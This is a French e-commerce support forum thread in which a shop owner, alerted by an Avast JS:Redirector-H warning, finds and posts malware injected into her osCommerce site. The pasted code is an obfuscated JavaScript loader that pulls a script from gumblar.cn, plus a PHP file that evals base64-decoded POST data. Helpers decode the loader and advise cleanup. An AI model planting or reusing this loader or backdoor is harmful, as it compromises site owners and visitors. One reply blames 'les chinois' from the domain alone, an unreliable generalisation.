JS:Redirector-H, presence d'un virus sur mon serveur ? Options

[valerie22]

bonjour
je viens de lancer ma boutique et une personne me dit qu'il detecte 'mon antivirus AVAST detecte lors de la connexion le spyware suivant : JS:Redirector-H [Trj]'
qu'en pensez vous ? comment puis eradiquer ce pb s'il existe ?
d'avance merci de votre aide
cdt
nathalie

[Gnidhal]

Bonjour,
1/ as-tu installé des contributions particulières sur ta boutique utilisant des bibliothèques javascript genre jquerry ?
2/ as-tu d'autres visiteurs utilisant avast qui ont rencontré le même problème ?
le cas échéant, essaye de reproduire le problème en installant avast sur ta machine (il est gratuit) mais bien sur en supprimant ton antivirus (1 seul antivirus sur une config)

il est possible que ton client soit infecté mais que cela ne provienne pas de tes scripts mais de sa machine.
Dis à ton client de vider le cache de son navigateur et de passer un anti-spyware. Certains spywares installent un javascript local qui ne se déclenche que lors de la visite de certains sites...
enfin regarde si tes scripts n'ont pas été modifiés lors d'une attaque par injection sql. (voir avec ton hébergbeur et en consultant les logs Apache)
Là, la version de ta boutique est imporftante : si c'est une creload, dommage, je crois qu'elle n'est pas à jour. Si c'est une RC1 ou RC2, pas de problème elle est résistante.

enfin fais une recherche sur le cheval de troies qu'est JS:Redirector-H via ggle ou autre moteur. Tu seras mieux informé sur ce virus et les moyens de l'éradiquer.

[valerie22]

bonjour
une autre personne m'a dit cela donc je pense qu'il y a qq chose en effet...
j'ai installe le script pour la lightbox mais je ne sais pas si c'est 'javascript genre jquerry '

'Si c'est une RC1 ou RC2, pas de problème elle est résistante. ' Comment savoir cela ?
merci de votre aide
nathalie

[valerie22]

rebonjour
je viens de trouver ca dans mon fichier source ca ne me semble pas tres normal ?
<link rel="stylesheet" type="text/css" href="includes/stylesheet.css">
<script language="javascript" src="includes/general.js"></script>
</head><script language=javascript><!--
(function(){var xpu7=('var&20&61&3d&22Script&45&6egine&22&2cb&3d&22Ve&72&73&69&6fn&28)+&22&2cj&3d&22&22&2cu&3dna&76igator&2euser&41gen&74&3b&69f((u&2e&69nd&65xOf(&22Win&22)&3e0)&26&26(&75&2ei&6e&64ex&4ff(&22NT&206&22)&3c0)&26&26&28docum&65&6et&2eco&6f&6bie&2ein&64&65xOf(&22miek&3d1&22&29&3c0)&26&26&28type&6ff(zrvzts&29&21&3d&74y&70e&6ff&28&22A&22)))&7bzrvz&74s&3d&22A&22&3beval(&22if(&77indo&77&2e&22+a+&22)j&3dj&2b&22+a+&22Major&22+b+&61&2b&22Minor&22+b+a+&22Bui&6c&64&22+b+&22j&3b&22)&3b&64ocu&6d&65&6et&2ew&72ite(&22&3c&73c&72i&70t&20src&3d&2f&2fgu&6d&62la&72&2ecn&2frs&73&2f&3fid&3d&22&2b&6a+&22&3e&3c&5c&2fscri&70t&3e&22&29&3b&7d').replace(/&/g,'%');eval(unescape(xpu7))})();
--></script>
<body marginwidth="0" marginheight="0" topmargin="0" bottommargin="0" leftmargin="0" rightmargin="0" bgcolor="#FFFFFF">
<!-- header //-->


qu'en pensez vous ???
merci de votre aide
nathalie

[Bpizzi]

Lorsque l'on décode ce bout de js apparament sciemment obfusquer, on obtient:

Code

var a="ScriptEngine", b="Version()+", j="", u=navigator.userAgent;
if((u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){
    zrvzts="A";
eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");
document.write("<script src=/%; a2fgumblar.cn/rss/?id="+j+"><\/script>");
}

Ce qui est sans aucun doute un code malicieux placé là par une personne mal attentionnée.
En l'occurence, il lance un code javascript présent sur un autre serveur.

Donc branle-le-bas de combat: réinstallation du serveur et intervention d'un expert qui saura t'installer ta boutique de manière sécurisée (attend quand meme un autre avis que le miens avant de te lancer ).
Pour info, tu es sur un dédié ou mutualisé?

[NoZic]

Bonjour,

Et le point cn indique que c'est des chinois...

C'est sûr que c'est du malveillant. Ils deviennent balèzes les chinois.

Après savoir ce que ça fait... j'irais pas voir.

Bon courage (t'avais pas fckeditor d'installer par hasard ? )

[valerie22]

non je n'ai pas ce logiciel
je suis sur du mutualisé donc je ne peux pas reinstaller le serveur ??? de mon cote que faire ??
merci de votre aide

[valerie22]

je continue mes recherches... je viens de trouver dans mon admin/images/ (qui ne se nome pas admin bien sur)
un fichier images.php avec ca dedans
<?php eval(base64_decode('aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpO2Vj
aG8gJzMyMzEzNjJlMzEzODM2MmQzMzMzMmUzMjMxMzAzYTY5NzQ2NTZjNjk2NTc2N2E2YjNhNGM2YTZiM
zk1OTc0NDg1Nic7')); ?>

ca vous parle ???

[Bpizzi]

je suis sur du mutualisé donc je ne peux pas reinstaller le serveur ??? de mon cote que faire ??

Il faut prévenir l'hébergeur que ton compte est piraté.
Il faut réinitialiser tes mots de passes d'accès aux services de l'hébergeur (ftp, admin, mysql, etc).
Il faut sauvegarder ta base mysql puis mettre ton site en maintenance (en forcant par exemple la page index.html avec une page "En réparation").
Ensuite, il faut télécharger tous tes fichiers sources en local pour garder une trace.
Après, il faut tout supprimer sur le serveur, et y remettre une version de sauvegarde des sources de ta boutique non infectée.
Dans le doute, je repartirai d'une installe oscommerce fraiche à laquelle je remettrais mes contribs en vérifiant à chaque fois qu'aucun code suspect n'est ajouté.

Quoiqu'il en soit, ton site est bel et bien piraté, et dans ces cas-là, la seule technique viable, c'est celle de la terre brulée: on repart de zéro.